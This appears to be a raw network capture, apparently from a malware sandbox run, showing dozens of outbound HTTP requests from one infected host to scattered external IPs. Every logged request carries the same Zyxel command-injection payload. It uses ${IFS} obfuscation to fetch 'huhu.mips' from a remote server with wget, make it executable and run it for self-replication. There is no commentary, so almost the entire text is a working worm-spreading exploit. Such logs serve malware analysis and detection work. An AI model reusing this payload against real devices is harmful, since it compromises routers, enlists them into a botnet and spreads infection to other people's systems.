                                                        Feb 2, 2024 06:21:27.280016899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8728192.168.2.1452938155.150.35.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280054092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8729192.168.2.143768072.190.210.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280100107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8730192.168.2.144475484.26.156.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280134916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8731192.168.2.145204261.185.236.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280183077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8732192.168.2.1436782113.30.120.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280221939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8733192.168.2.144365486.221.59.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280250072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8734192.168.2.1457326218.130.135.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280298948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8735192.168.2.143464294.81.169.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280328035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8736192.168.2.144101024.36.43.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280349016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8737192.168.2.144341213.214.229.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280411959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8738192.168.2.14579468.52.66.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280441999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8739192.168.2.1451584200.239.94.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280491114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8740192.168.2.143316494.62.93.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280555964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8741192.168.2.1436668110.167.29.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280565977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8742192.168.2.14504222.146.167.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280594110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8743192.168.2.143644646.124.177.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280622959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8744192.168.2.14556762.252.197.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280689955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8745192.168.2.1439958146.250.114.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280714035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8746192.168.2.145992299.201.98.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280744076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8747192.168.2.144470474.149.174.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280805111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8748192.168.2.143596641.216.57.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280852079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8749192.168.2.1447088165.154.96.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280879974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8750192.168.2.145679458.65.176.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280950069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8751192.168.2.1455898156.115.155.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.280996084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8752192.168.2.1439294188.236.39.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281017065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8753192.168.2.1443904220.87.191.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281060934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8754192.168.2.144953625.236.79.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281122923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8755192.168.2.1440998204.242.155.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281147003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8756192.168.2.14370021.201.162.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281186104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8757192.168.2.144072024.107.235.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281233072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8758192.168.2.1444220109.219.31.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281279087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8759192.168.2.1433412150.248.189.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281325102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8760192.168.2.1452904146.53.5.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281357050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8761192.168.2.1436084200.94.29.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281385899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8762192.168.2.143776257.54.4.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281436920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8763192.168.2.144076080.82.17.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281478882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8764192.168.2.1434038219.241.217.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281543016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8765192.168.2.14556848.6.152.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281549931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8766192.168.2.143443275.154.54.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281614065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8767192.168.2.144420885.224.27.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281653881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8768192.168.2.143290077.127.131.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281697035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8769192.168.2.145299874.163.222.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281728983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8770192.168.2.1435630206.53.24.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281768084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8771192.168.2.1458398181.248.36.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281794071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8772192.168.2.1450768150.88.223.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281821966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8773192.168.2.1456976130.251.107.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281852961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8774192.168.2.1434634116.103.46.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281893015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8775192.168.2.1460840110.49.226.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281938076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8776192.168.2.1440642125.248.207.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281960011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8777192.168.2.1447670216.170.151.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.281997919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8778192.168.2.1460274168.240.188.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282054901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8779192.168.2.145665035.128.55.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282110929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8780192.168.2.144499836.149.199.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282146931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8781192.168.2.1451538206.207.14.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282207012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8782192.168.2.1447600170.136.113.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282242060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8783192.168.2.1458304219.164.123.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282294035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8784192.168.2.1455498191.115.155.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282334089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8785192.168.2.145228846.152.155.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282356977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8786192.168.2.1448102131.69.182.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282390118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8787192.168.2.1432798150.231.116.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282429934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8788192.168.2.143653443.104.52.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282474995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8789192.168.2.1441662222.124.226.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282500029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8790192.168.2.1457494162.152.1.14443
                                                        TimestampBytes transferredDirectionData
